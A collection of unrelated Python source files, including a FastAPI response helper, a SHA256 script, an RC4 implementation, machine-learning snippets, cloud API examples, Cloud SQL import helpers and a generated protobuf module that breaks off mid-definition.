import socket
from typing import Any
import orjson
from fastapi.responses import ORJSONResponse as O
from pydantic import BaseModel
def default_encode(obj):
    # Fallback encoder for types orjson cannot serialize natively.
    if isinstance(obj, BaseModel):
        return obj.dict()
    raise NotImplementedError


class ORJSONResponse(O):
    def render(self, content: Any) -> bytes:
        return orjson.dumps(content, default=default_encode)


def get_my_ip() -> str:
    # Connecting a UDP socket selects an outbound route without sending any
    # packets, so getsockname() reveals the local IP used for that route.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(('10.255.255.255', 1))
        return s.getsockname()[0]
    finally:
        s.close()
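A minimal usage sketch, assuming FastAPI is installed; the app and the /ip route below are illustrative additions, not part of the original module:
from fastapi import FastAPI

app = FastAPI(default_response_class=ORJSONResponse)

@app.get("/ip")
def read_ip():
    # BaseModel instances returned by other routes are handled by default_encode above.
    return {"ip": get_my_ip()}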
|
# Copyright 2018 the Deno authors. All rights reserved. MIT license.
"""
Computes the SHA256 hash and formats the result.
"""
import argparse
from hashlib import sha256
import os
import sys
def main():
parser = argparse.ArgumentParser(description=__doc__)
# Arguments specifying where input comes from.
# If multiple sources are specified, they are all concatenated together.
parser.add_argument(
"--input",
action="append",
dest="input",
        type=lambda s: s.encode("utf-8"),  # store bytes so hashing works alongside --infile
metavar="TEXT",
help="Hash literal text specified on the command line.")
parser.add_argument(
"--infile",
action="append",
dest="input",
type=read_file,
metavar="FILE",
help="Hash the contents of a file.")
# Arguments dealing with output.
parser.add_argument(
"--format",
type=str,
dest="format",
default="%s",
metavar="TEMPLATE",
help="Format output using Python template (default = '%%s').")
parser.add_argument(
"--outfile",
dest="outfile",
type=argparse.FileType("wb"),
default=sys.stdout,
metavar="FILE",
help="Write the formatted hash to a file (default = stdout).")
# Parse arguments. Print usage and exit if given no input.
args = parser.parse_args()
if (not args.input):
parser.print_usage()
return 1
# Compute the hash of all inputs concatenated together.
hasher = sha256()
for data in args.input:
hasher.update(data)
h = hasher.hexdigest()
# Format and write to specified out file (or the default, stdout).
args.outfile.write(args.format % h)
def read_file(filename):
with open(filename, "rb") as f:
return f.read()
if __name__ == '__main__':
sys.exit(main())
|
import bs4 as bs
import urllib.request
def get_article(site='https://www.brainpickings.org/2016/08/16/friendship/'):
# Scraping data using urllib and then parsing using beautifulsoup (by paragraph)
scraped_data = urllib.request.urlopen(site)
article = scraped_data.read()
parsed_article = bs.BeautifulSoup(article,'lxml')
paragraphs = parsed_article.find_all('p')
# Transfer into a string
article_text = ""
for p in paragraphs:
article_text += p.text
return article_text
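A small usage sketch (hypothetical driver code; requires network access and the lxml parser used above):
if __name__ == '__main__':
    text = get_article()
    print(text[:200])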
|
"""Contains all exposed elements from the handlers.
"""
# Scan the handlers folder on disk and collect
# the read_x and write_x functions exposed by each handler.
__all__ = []
|
import tensorflow as tf
import numpy as np
n_inputs = 3
n_neurons = 5
n_steps = 2
seq_length = tf.placeholder(tf.int32, [None])
X = tf.placeholder(tf.float32, [None, n_steps, n_inputs])
X_seqs = tf.unstack(tf.transpose(X, perm=[1, 0, 2]))
basic_cell = tf.contrib.rnn.BasicRNNCell(num_units=n_neurons)
output_seqs, states = tf.contrib.rnn.static_rnn(basic_cell, X_seqs, dtype=tf.float32, sequence_length=seq_length)
outputs = tf.transpose(tf.stack(output_seqs), perm=[1,0,2])
X_batch = np.random.rand(4, 2, 3)
seq_leng_batch = np.array([2, 2, 2, 2])
with tf.Session() as sess:
tf.global_variables_initializer().run()
outputs_val, states_val = sess.run([outputs, states], feed_dict={X:X_batch, seq_length:seq_leng_batch})
outputs_val1, states_val1 = sess.run([outputs, states], feed_dict={X:X_batch, seq_length:seq_leng_batch})
assert(np.all(outputs_val==outputs_val1))
seq_leng_batch = np.array([2, 2, 2, 2])
outputs_val2, states_val2 = sess.run([outputs, states], feed_dict={X:X_batch, seq_length:seq_leng_batch})
|
# -*- coding: utf-8 -*-
import click
from rich.console import Console
from .add import add
from .mklib import mklib
CONSOLE = Console()
@click.group()
def main():
pass
mklib = main.command(help="Create new empty library.")(mklib)
add = main.command(help="Add model to existing library.")(add)
|
from mongoengine.errors import (DoesNotExist, MultipleObjectsReturned,
InvalidQueryError, OperationError,
NotUniqueError)
from mongoengine.queryset.field_list import *
from mongoengine.queryset.manager import *
from mongoengine.queryset.queryset import *
from mongoengine.queryset.transform import *
from mongoengine.queryset.visitor import *
__all__ = (field_list.__all__ + manager.__all__ + queryset.__all__ +
transform.__all__ + visitor.__all__)
|
from com.xhaus.jyson import JysonCodec as json
from ij import IJ
from ij.plugin.frame import RoiManager
from ij.io import OpenDialog
from ij.gui import Roi, PolygonRoi, ShapeRoi, Line
import sys
def get_roi(data):
if data['type'] == 'polygon':
return PolygonRoi(data['x'], data['y'], data['count'], Roi.POLYGON)
elif data['type'] == 'composite':
comp_rois = []
count = data['count']
last = count - 1
for i in range(count):
comp_rois.append(get_roi(data['rois'][i]))
roi = ShapeRoi(comp_rois[last])
for j in range(last):
roi.not(ShapeRoi(comp_rois[j]))
return roi
elif data['type'] == 'line':
return Line(data['x1'], data['y1'], data['x2'], data['y2'])
rm = RoiManager.getInstance()
if rm:
directory = "C:/Users/timre/Desktop/tutorial set/" # SET DATASET PATH HERE
imp = IJ.getImage()
name = directory + imp.title[:-4] + '.json'
file = open(name,'r')
read = file.read()
data = json.loads(read)
rm.reset()
for i in range(data['count']):
rm.addRoi(get_roi(data['rois'][i]))
rm.rename(i, data['classes'][i])
file.close()
else:
print("No roi manager open")
|
# RC4
# https://en.wikipedia.org/wiki/RC4
# Key-scheduling algorithm (KSA)
def ksa(key):
s = []
for i in range(0, 256):
s.append(i)
j = 0
for i in range(0, 256):
j = (j + s[i] + ord(key[i % len(key)])) % 256
s[i], s[j] = s[j], s[i]
return s
# Pseudo-random generation algorithm (PRGA)
def prga(s, text):
output = ''
i = 0
j = 0
for x in range(0, len(text)):
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i], s[j] = s[j], s[i]
k = s[(s[i] + s[j]) % 256]
output += chr(k ^ ord(text[x]))
return output
def rc4crypt(key, data):
return prga(ksa(key), data)
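A quick round-trip check of the two routines above (illustrative only; RC4 is obsolete and must not be used for real security):
if __name__ == '__main__':
    key = 'Key'
    ciphertext = rc4crypt(key, 'Plaintext')
    # Decryption is the same operation with the same key, since XOR is its own inverse.
    assert rc4crypt(key, ciphertext) == 'Plaintext'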
|
# -*- coding: utf-8 -*-
# The above encoding declaration is required and the file must be saved as UTF-8
import random
class LotoTron:
    def __init__(self, min_num=1, max_num=90):
        self._min_num = min_num
        self._max_num = max_num
        self._src_list = list(range(self._min_num, self._max_num + 1))
        random.shuffle(self._src_list)

    def get_next_keg(self):
        # Pop the next number; raises IndexError once every keg has been drawn.
        keg = self._src_list.pop()
        return keg
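A brief usage sketch (hypothetical driver code, not part of the original class):
if __name__ == '__main__':
    tron = LotoTron(1, 10)
    # Draw every keg exactly once, in shuffled order.
    for _ in range(10):
        print(tron.get_next_keg())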
|
import pytest
from texthooks.fix_ligatures import parse_args as fix_ligatures_parse_args
from texthooks.fix_smartquotes import (
DEFAULT_DOUBLE_QUOTE_CODEPOINTS,
DEFAULT_SINGLE_QUOTE_CODEPOINTS,
)
from texthooks.fix_smartquotes import parse_args as fix_smartquotes_parse_args
def test_fix_ligatures_arg_parsing():
args1 = fix_ligatures_parse_args(argv=["foo", "bar"])
assert list(args1.files) == ["foo", "bar"]
assert args1.show_changes is False
args2 = fix_ligatures_parse_args(argv=["foo", "--show-changes"])
assert list(args2.files) == ["foo"]
assert args2.show_changes is True
def test_fix_smartquotes_arg_parsing():
args1 = fix_smartquotes_parse_args(argv=["foo", "bar"])
assert list(args1.files) == ["foo", "bar"]
assert args1.show_changes is False
assert args1.double_quote_codepoints == DEFAULT_DOUBLE_QUOTE_CODEPOINTS
assert args1.single_quote_codepoints == DEFAULT_SINGLE_QUOTE_CODEPOINTS
args2 = fix_smartquotes_parse_args(argv=["foo", "--show-changes"])
assert list(args2.files) == ["foo"]
assert args2.show_changes is True
assert args2.double_quote_codepoints == DEFAULT_DOUBLE_QUOTE_CODEPOINTS
assert args2.single_quote_codepoints == DEFAULT_SINGLE_QUOTE_CODEPOINTS
args3 = fix_smartquotes_parse_args(
argv=["foo", "--double-quote-codepoints", "FF02,201C"]
)
assert list(args3.files) == ["foo"]
assert args3.show_changes is False
assert list(args3.double_quote_codepoints) == ["FF02", "201C"]
assert args3.single_quote_codepoints == DEFAULT_SINGLE_QUOTE_CODEPOINTS
args4 = fix_smartquotes_parse_args(
argv=["foo", "--single-quote-codepoints", "FF07,201B"]
)
assert list(args4.files) == ["foo"]
assert args4.show_changes is False
    assert args4.double_quote_codepoints == DEFAULT_DOUBLE_QUOTE_CODEPOINTS
assert list(args4.single_quote_codepoints) == ["FF07", "201B"]
@pytest.mark.parametrize(
"parse_func", [fix_ligatures_parse_args, fix_smartquotes_parse_args]
)
def test_invalid_color_opt(parse_func):
with pytest.raises(SystemExit) as excinfo:
parse_func(argv=["foo", "--color", "bar"])
err = excinfo.value
assert err.code == 2
|
#!/usr/bin/env python
""" Calculate the number of increases in a list of subsequent measurements which are smoothed
in a sliding window. Measurements are read from file
"""
import fileinput
import sys
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: day1_sonar_sweep_part2.py <measurements file>")
sys.exit(-1)
input_file = sys.argv[1]
measurements = [int(line) for line in fileinput.input(files=input_file) if line.strip() != '']
sliding_window = [sum(window) for window in zip(measurements, measurements[1:], measurements[2:])]
increases = sum(((m2-m1) > 0 for (m1, m2) in zip(sliding_window, sliding_window[1:])))
print(increases)
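For a quick sanity check without a file, the same logic can be run on an in-memory sample (hypothetical data):
sample = [199, 200, 208, 210, 200, 207, 240, 269, 260, 263]
windows = [sum(w) for w in zip(sample, sample[1:], sample[2:])]
print(sum(m2 > m1 for m1, m2 in zip(windows, windows[1:])))  # prints 5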
|
import sys
from inference_model import InferenceModel
from shared_latent_space import SharedLatentSpace
from decoder_train import DecoderTrain
from training import Training
from testing import Testing
from reconstructor import Reconstructor
from visualizer import Visualizer
import warnings
warnings.filterwarnings("ignore")
arguments = sys.argv
inference_model = InferenceModel()
if len(arguments) > 2:
    # Both the iteration and epoch counts must be supplied.
    iteration = arguments[1]
    epochs = arguments[2]
    inference_model.Iteration = int(iteration)
    inference_model.Epoch = int(epochs)
visualizer = Visualizer(inference_model)
shared_latent_space = SharedLatentSpace()
shared_latent_space.calculateZ(inference_model)
decoder = DecoderTrain(inference_model,shared_latent_space)
training = Training(inference_model,decoder)
testing = Testing(inference_model,decoder)
reconstructor = Reconstructor()
reconstructor.constructXtest(inference_model,training,testing)
reconstructor.constructXtrain(inference_model,training,testing)
visualizer.data_display(inference_model.XY_TrainLength,reconstructor.X_reconstructed_train,'X_reconstructed_train.png',False,False)
visualizer.data_display(inference_model.XY_TrainLength,inference_model.X_train,'X_train.png',False,False)
visualizer.data_display(inference_model.XY_TestLength,reconstructor.X_reconstructed_test,'X_reconstructed_test.png',False,True)
visualizer.data_display(inference_model.XY_TestLength,inference_model.X_test,'X_test.png',False,True)
visualizer.plotter(inference_model,reconstructor)
|
import numpy as np
from scipy.stats import multivariate_normal
from to.probabilistic_model import ProbabilisticModel
class MixtureModel(object):
def __init__(self, allModels, alpha=False):
self.model_list = allModels.copy()
self.nModels = len(allModels)
if alpha is False:
self.alpha = (1/self.nModels)*np.ones(self.nModels)
else:
self.alpha = alpha
self.probTable = None
self.nSol = None
self.__target_model_added = False
def add_target_solutions(self, solutions, modelType):
if not self.__target_model_added:
self.nModels = self.nModels + 1
self.model_list.append(ProbabilisticModel(modelType=modelType))
self.model_list[-1].buildModel(solutions)
            self.__target_model_added = True
else:
raise Exception('Target model is already added.')
def add_target_model(self, target_model):
if not self.__target_model_added:
self.nModels = self.nModels + 1
self.model_list.append(target_model)
            self.__target_model_added = True
else:
raise Exception('Target model is already added.')
def createTable(self, solutions, CV, modelType, probs_RL=None):
if CV:
self.add_target_solutions(solutions, modelType)
# self.nModels = self.nModels + 1
# self.model_list.append(ProbabilisticModel(modelType=modelType))
# self.model_list[-1].buildModel(solutions)
self.alpha = (1/self.nModels) * np.ones(self.nModels)
nSol = solutions.shape[0]
self.nSol = nSol
self.probTable = np.ones([nSol, self.nModels])
if probs_RL is None:
for j in range(self.nModels-1):
self.probTable[:, j] = self.model_list[j].pdfEval(solutions)
else:
for j in range(0, self.nModels-2):
self.probTable[:, j] = self.model_list[j].pdfEval(solutions)
self.probTable[:, -2] = probs_RL
for i in range(nSol): # Leave-one-out cross validation
x = np.concatenate((solutions[:i, :], solutions[i+1:, :]))
tModel = ProbabilisticModel(modelType=modelType)
tModel.buildModel(x)
self.probTable[i, -1] = tModel.pdfEval(solutions[[i], :])
else:
nSol = solutions.shape[0]
self.probTable = np.ones([nSol, self.nModels])
for j in range(self.nModels):
self.probTable[:, j] = self.model_list[j].pdfEval(solutions)
self.nSol = nSol
def EMstacking(self):
iterations = 100
for _ in range(iterations):
talpha = self.alpha
probVector = np.matmul(self.probTable, talpha.T)
for i in range(self.nModels):
talpha[i] = np.sum((1/self.nSol)*talpha[i]*self.probTable[:, i]/probVector)
self.alpha = talpha
def mutate(self):
modif_alpha = np.maximum(self.alpha + np.random.normal(0, 0.01, self.nModels), 0)
total_alpha = np.sum(modif_alpha)
if total_alpha == 0:
self.alpha = np.zeros(self.nModels)
self.alpha[-1] = 1
else:
self.alpha = modif_alpha/total_alpha
def sample(self, nSol, samplesRL=None):
# print('sample: ', self.alpha)
indSamples = np.ceil(nSol*self.alpha).astype(int)
solutions = np.array([])
for i in range(self.nModels):
if indSamples[i] == 0:
pass
elif i == self.nModels - 2 and samplesRL is not None:
solutions = np.vstack([solutions, samplesRL]) if solutions.size else samplesRL
else:
sols = self.model_list[i].sample(indSamples[i])
solutions = np.vstack([solutions, sols]) if solutions.size else sols
solutions = solutions[np.random.permutation(solutions.shape[0]), :]
solutions = solutions[:nSol, :]
return solutions
def sample_dic(self, nSol):
model_sample_pairs = np.ndarray(self.nModels, dtype=object)
indSamples = np.ceil(nSol*self.alpha).astype(int)
print('indSamples : {}'.format(indSamples))
for i in range(self.nModels):
if indSamples[i] == 0:
pass
else:
model_sample_pairs[i] = self.model_list[i].sample(indSamples[i])
# removing random solutions
print('sample_length: ', np.sum([len(s) for s in model_sample_pairs if s is not None]))
# solutions = solutions[np.random.permutation(solutions.shape[0]), :]
# solutions = solutions[:nSol, :]
return model_sample_pairs
def n_samples(self, ind, nSol):
return np.ceil(nSol * self.alpha[ind]).astype(int)
|
from collections import namedtuple
DetectedObjectTuple = namedtuple('DetectedObject', 'id label x y w h score frame timestamp')
class DetectedObject(DetectedObjectTuple):
@property
def cx(self):
return self.x + self.w / 2
@property
def cy(self):
return self.y + self.h / 2
@staticmethod
def from_dict(d):
d['id'] = int(d['id'])
d['frame'] = int(d['frame'])
d['x'] = float(d['x'])
d['y'] = float(d['y'])
d['w'] = float(d['w'])
d['h'] = float(d['h'])
d['score'] = float(d['score'])
d['timestamp'] = float(d['timestamp'])
# todo: remove
if 'cx' in d:
del d['cx']
if 'cy' in d:
del d['cy']
return DetectedObject(**d)
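A short usage sketch with a hypothetical CSV-style row (all values arrive as strings and are coerced by from_dict):
row = {'id': '7', 'label': 'car', 'x': '10', 'y': '20', 'w': '30', 'h': '40',
       'score': '0.9', 'frame': '12', 'timestamp': '0.4'}
obj = DetectedObject.from_dict(row)
print(obj.cx, obj.cy)  # 25.0 40.0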
|
from abc import ABCMeta, abstractmethod
import logging
import time
import pause
logging.basicConfig()
class Timer(object, metaclass=ABCMeta):
    """ Timer abstract base class represents the interface for a periodic timer. """
@abstractmethod
def wait(self):
pass
@abstractmethod
def getTime(self):
pass
@staticmethod
def factory(type, interval):
if type == "Sleep": return Sleep(interval)
if type == "Dummy": return Dummy(interval)
assert 0, "Bad timer: " + type
class Sleep():
""" Implementation of class Timer using a simple sleep command.
"""
def __init__(self, interval):
self.interval = interval
self.last = int(time.time())
self.start = self.last
def wait(self):
pause.until(self.last + self.interval)
self.last = self.last + self.interval
return True
def getTime(self):
return int(time.time()) - self.start
class Dummy():
""" Dummy implementation of class Timer for testing.
"""
def __init__(self, interval):
self.interval = interval
self.time = 0
def wait(self):
self.time = self.time + self.interval
return True
def getTime(self):
return self.time
if __name__ == "__main__":
print("Test Timer")
timer = Timer.factory("Sleep", 1)
for interval in range(0,9):
timer.wait()
print(timer.getTime(), " seconds")
|
# Create a block storage
from oneandone.client import OneAndOneService, BlockStorage
client = OneAndOneService('<API-TOKEN>')
block_storage = BlockStorage(name='My new block storage',
description='My block storage description',
size=20,
datacenter_id='908DC2072407C94C8054610AD5A53B8C')
response = client.create_block_storage(block_storage)
# List all block storages
from oneandone.client import OneAndOneService, BlockStorage
client = OneAndOneService('<API-TOKEN>')
response = client.list_block_storages()
# Retrieve a single block storage
from oneandone.client import OneAndOneService
client = OneAndOneService('<API-TOKEN>')
response = client.get_block_storage(block_storage_id='')
# Modify a block storage
from oneandone.client import OneAndOneService
client = OneAndOneService('<API-TOKEN>')
response = client.modify_block_storage(block_storage_id='',
name='New name',
description='New Description')
# Attach block storage to a server
from oneandone.client import OneAndOneService
client = OneAndOneService('<API-TOKEN>')
response = client.attach_block_storage(block_storage_id='', server_id='')
# Detach a block storage from a server
from oneandone.client import OneAndOneService
client = OneAndOneService('<API-TOKEN>')
response = client.detach_block_storage(block_storage_id='')
# Delete a block storage
from oneandone.client import OneAndOneService
client = OneAndOneService('<API-TOKEN>')
response = client.delete_block_storage(block_storage_id='')
|
import chainer
from chainer.dataset import convert
from chainer.training import StandardUpdater
def fetch(iterators, converter, device=None):
return converter(iterators['main'].next(), device)
class TrainingStep(StandardUpdater):
def __init__(self, iterator, optimizer, metrics_func,
converter=convert.concat_examples, device=None,
fetch_func=fetch, metrics_option=None):
super(TrainingStep, self).__init__(iterator, optimizer, converter,
device)
if isinstance(optimizer, dict):
self._target = {name: opt.target for name, opt in optimizer.items()}
else:
self._target = optimizer.target
self._fetch_func = fetch_func
self._metrics_func = metrics_func
self._metrics_option = metrics_option
def update_core(self):
batch = self._fetch_func(self._iterators, self.converter, self.device)
if self._metrics_option is None:
step_result = self._metrics_func(self._target, batch)
else:
step_result = self._metrics_func(self._target, batch, self._metrics_option)
if isinstance(self._target, dict):
for name in self._target.keys():
                if name in step_result:
self._post_process(name, step_result[name])
else:
self._post_process('main', step_result)
def _post_process(self, name, result):
if isinstance(result, dict):
loss = result['loss']
metrics = result
else:
loss = result
metrics = {'loss': loss}
optimizer = self.get_optimizer(name)
target = optimizer.target
target.cleargrads()
loss.backward()
optimizer.update()
chainer.report(metrics, target)
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common command-agnostic utility functions for sql import commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
def SqlImportContext(sql_messages, uri, database=None, user=None):
"""Generates the ImportContext for the given args, for importing from SQL.
Args:
sql_messages: module, The messages module that should be used.
uri: The URI of the bucket to import from; the output of the 'uri' arg.
database: The database to import to; the output of the '--database' flag.
user: The Postgres user to import as; the output of the '--user' flag.
Returns:
ImportContext, for use in InstancesImportRequest.importContext.
"""
return sql_messages.ImportContext(
kind='sql#importContext',
uri=uri,
database=database,
fileType=sql_messages.ImportContext.FileTypeValueValuesEnum.SQL,
importUser=user)
def CsvImportContext(sql_messages,
uri,
database,
table,
columns=None,
user=None):
"""Generates the ImportContext for the given args, for importing from CSV.
Args:
sql_messages: module, The messages module that should be used.
uri: The URI of the bucket to import from; the output of the 'uri' arg.
database: The database to import into; the output of the '--database' flag.
table: The table to import into; the output of the '--table' flag.
    columns: The CSV columns to import from; the output of the '--columns' flag.
user: The Postgres user to import as; the output of the '--user' flag.
Returns:
ImportContext, for use in InstancesImportRequest.importContext.
"""
return sql_messages.ImportContext(
kind='sql#importContext',
csvImportOptions=sql_messages.ImportContext.CsvImportOptionsValue(
columns=columns or [], table=table),
uri=uri,
database=database,
fileType=sql_messages.ImportContext.FileTypeValueValuesEnum.CSV,
importUser=user)
def BakImportContext(sql_messages, uri, database, cert_path, pvk_path,
pvk_password):
"""Generates the ImportContext for the given args, for importing from BAK.
Args:
sql_messages: module, The messages module that should be used.
uri: The URI of the bucket to import from; the output of the `uri` arg.
database: The database to import to; the output of the `--database` flag.
cert_path: The certificate used for encrypted .bak; the output of the
`--cert-path` flag.
pvk_path: The private key used for encrypted .bak; the output of the
`--pvk-path` flag.
pvk_password: The private key password used for encrypted .bak; the output
of the `--pvk-password` or `--prompt-for-pvk-password` flag.
Returns:
ImportContext, for use in InstancesImportRequest.importContext.
"""
bak_import_options = None
if cert_path and pvk_path and pvk_password:
bak_import_options = sql_messages.ImportContext.BakImportOptionsValue(
encryptionOptions=sql_messages.ImportContext.BakImportOptionsValue
.EncryptionOptionsValue(
certPath=cert_path, pvkPath=pvk_path, pvkPassword=pvk_password))
return sql_messages.ImportContext(
kind='sql#importContext',
uri=uri,
database=database,
fileType=sql_messages.ImportContext.FileTypeValueValuesEnum.BAK,
bakImportOptions=bak_import_options)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: root.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='root.proto',
package='',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\nroot.proto\"\xf6\x10\n\x06nested\x1a\x1f\n\x01\x61\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t\x1a\x1f\n\x01\x62\x12\x0e\n\x06method\x18\x01 \x01(\t\x12\n\n\x02iv\x18\x02 \x01(\x05\x1a\xff\x01\n\x13JudgeTimingBusiBuff\x12\x0b\n\x03Seq\x18\x01 \x01(\x03\x12\x0b\n\x03qua\x18\x02 \x01(\t\x12\x12\n\ndeviceInfo\x18\x03 \x01(\t\x12%\n\x08\x62usiBuff\x18\x04 \x01(\x0b\x32\x13.nested.JudgeTiming\x12\x0f\n\x07traceid\x18\x05 \x01(\t\x12\x0e\n\x06Module\x18\x06 \x01(\t\x12\x0f\n\x07\x43mdname\x18\x07 \x01(\t\x12 \n\x08loginSig\x18\x08 \x01(\x0b\x32\x0e.nested.C0011a\x12\x19\n\x06\x43rypto\x18\t \x01(\x0b\x32\t.nested.b\x12\x0f\n\x07\x45xtinfo\x18\n \x01(\x05\x12\x13\n\x0b\x63ontentType\x18\x0b \x01(\x05\x1a\xef\x01\n\x18GetAppInfoByLinkBusiBuff\x12\x0b\n\x03Seq\x18\x01 \x01(\x03\x12\x0b\n\x03qua\x18\x02 \x01(\t\x12\x12\n\ndeviceInfo\x18\x03 \x01(\t\x12\x10\n\x08\x62usiBuff\x18\x04 \x01(\x0c\x12\x0f\n\x07traceid\x18\x05 \x01(\t\x12\x0e\n\x06Module\x18\x06 \x01(\t\x12\x0f\n\x07\x43mdname\x18\x07 \x01(\t\x12 \n\x08loginSig\x18\x08 \x01(\x0b\x32\x0e.nested.C0011a\x12\x19\n\x06\x43rypto\x18\t \x01(\x0b\x32\t.nested.b\x12\x0f\n\x07\x45xtinfo\x18\n \x01(\x05\x12\x13\n\x0b\x63ontentType\x18\x0b \x01(\x05\x1a\x66\n\nUseUserApp\x12\r\n\x05\x61ppId\x18\x01 \x01(\t\x12\x0f\n\x07verType\x18\x02 \x01(\x03\x12\x0e\n\x06source\x18\x03 \x01(\x03\x12(\n\x0b\x63hannelInfo\x18\x04 \x01(\x0b\x32\x13.nested.channelInfo\x1a)\n\x0b\x63hannelInfo\x12\r\n\x05refer\x18\x01 \x01(\t\x12\x0b\n\x03via\x18\x02 \x01(\t\x1a\xe9\x01\n\x12UseUserAppBusiBuff\x12\x0b\n\x03Seq\x18\x01 \x01(\x03\x12\x0b\n\x03qua\x18\x02 \x01(\t\x12\x12\n\ndeviceInfo\x18\x03 \x01(\t\x12\x10\n\x08\x62usiBuff\x18\x04 \x01(\x0c\x12\x0f\n\x07traceid\x18\x05 \x01(\t\x12\x0e\n\x06Module\x18\x06 \x01(\t\x12\x0f\n\x07\x43mdname\x18\x07 \x01(\t\x12 \n\x08loginSig\x18\x08 \x01(\x0b\x32\x0e.nested.C0011a\x12\x19\n\x06\x43rypto\x18\t \x01(\x0b\x32\t.nested.b\x12\x0f\n\x07\x45xtinfo\x18\n \x01(\x05\x12\x13\n\x0b\x63ontentType\x18\x0b \x01(\x05\x1a\xe6\x01\n\x0fGetCodeBusiBuff\x12\x0b\n\x03Seq\x18\x01 \x01(\x03\x12\x0b\n\x03qua\x18\x02 \x01(\t\x12\x12\n\ndeviceInfo\x18\x03 \x01(\t\x12\x10\n\x08\x62usiBuff\x18\x04 \x01(\x0c\x12\x0f\n\x07traceid\x18\x05 \x01(\t\x12\x0e\n\x06Module\x18\x06 \x01(\t\x12\x0f\n\x07\x43mdname\x18\x07 \x01(\t\x12 \n\x08loginSig\x18\x08 \x01(\x0b\x32\x0e.nested.C0011a\x12\x19\n\x06\x43rypto\x18\t \x01(\x0b\x32\t.nested.b\x12\x0f\n\x07\x45xtinfo\x18\n \x01(\x05\x12\x13\n\x0b\x63ontentType\x18\x0b \x01(\x05\x1av\n\x0eGetAppInfoById\x12\r\n\x05\x61ppid\x18\x01 \x01(\t\x12\x17\n\x0fneedVersionInfo\x18\x02 \x01(\x03\x12\x15\n\rcheckDevRight\x18\x03 \x01(\x03\x12\x11\n\tfirstPath\x18\x04 \x01(\t\x12\x12\n\nenvVersion\x18\x05 \x01(\t\x1a\xed\x01\n\x16GetAppInfoByIdBusiBuff\x12\x0b\n\x03Seq\x18\x01 \x01(\x03\x12\x0b\n\x03qua\x18\x02 \x01(\t\x12\x12\n\ndeviceInfo\x18\x03 \x01(\t\x12\x10\n\x08\x62usiBuff\x18\x04 \x01(\x0c\x12\x0f\n\x07traceid\x18\x05 \x01(\t\x12\x0e\n\x06Module\x18\x06 \x01(\t\x12\x0f\n\x07\x43mdname\x18\x07 \x01(\t\x12 \n\x08loginSig\x18\x08 \x01(\x0b\x32\x0e.nested.C0011a\x12\x19\n\x06\x43rypto\x18\t \x01(\x0b\x32\t.nested.b\x12\x0f\n\x07\x45xtinfo\x18\n \x01(\x05\x12\x13\n\x0b\x63ontentType\x18\x0b \x01(\x05\x1a_\n\x01\x64\x12\x0b\n\x03Seq\x18\x01 \x01(\x05\x12\x0f\n\x07retCode\x18\x02 \x01(\x03\x12\x0e\n\x06\x65rrMsg\x18\x03 \x01(\x0c\x12\x10\n\x08\x62usiBuff\x18\x04 \x01(\x0c\x12\x1a\n\x07\x45xtinfo\x18\x05 
\x03(\x0b\x32\t.nested.a\x1a\x91\x01\n\x06\x43\x30\x30\x31\x31\x61\x12\x0b\n\x03uin\x18\x01 \x01(\t\x12\x0b\n\x03sig\x18\x02 \x01(\t\x12\x10\n\x08platform\x18\x03 \x01(\t\x12\x0c\n\x04type\x18\x04 \x01(\x05\x12\r\n\x05\x61ppid\x18\x05 \x01(\t\x12\x0e\n\x06openid\x18\x06 \x01(\t\x12\x12\n\nsessionkey\x18\x07 \x01(\x0c\x12\x1a\n\x07\x45xtinfo\x18\x08 \x03(\x0b\x32\t.nested.a\x1a\x35\n\x03q2b\x12\x1a\n\x07mapInfo\x18\x01 \x03(\x0b\x32\t.nested.a\x12\x12\n\nattachInfo\x18\x02 \x01(\t\x1a\x85\x02\n\x0bJudgeTiming\x12\x1c\n\x07\x65xtInfo\x18\x01 \x01(\x0b\x32\x0b.nested.q2b\x12\r\n\x05\x61ppid\x18\x02 \x01(\t\x12\x10\n\x08\x66\x61\x63tType\x18\x03 \x01(\x05\x12\x10\n\x08\x64uration\x18\x04 \x01(\x05\x12\x12\n\nreportTime\x18\x05 \x01(\x03\x12\x14\n\x0c\x61\x66terCertify\x18\x06 \x01(\x05\x12\x0f\n\x07\x61ppType\x18\x07 \x01(\x05\x12\r\n\x05scene\x18\x08 \x01(\x05\x12\x11\n\ttotalTime\x18\t \x01(\x05\x12\x10\n\x08launchId\x18\n \x01(\t\x12\x0b\n\x03via\x18\x0b \x01(\t\x12\x14\n\x0c\x41\x64sTotalTime\x18\x0c \x01(\x05\x12\x13\n\x0bhostExtInfo\x18\r \x01(\t\x1a\x32\n\x10GetAppInfoByLink\x12\x0c\n\x04link\x18\x01 \x01(\t\x12\x10\n\x08linkType\x18\x02 \x01(\x05\x62\x06proto3'
)
_NESTED_A = _descriptor.Descriptor(
name='a',
full_name='nested.a',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='nested.a.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='nested.a.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
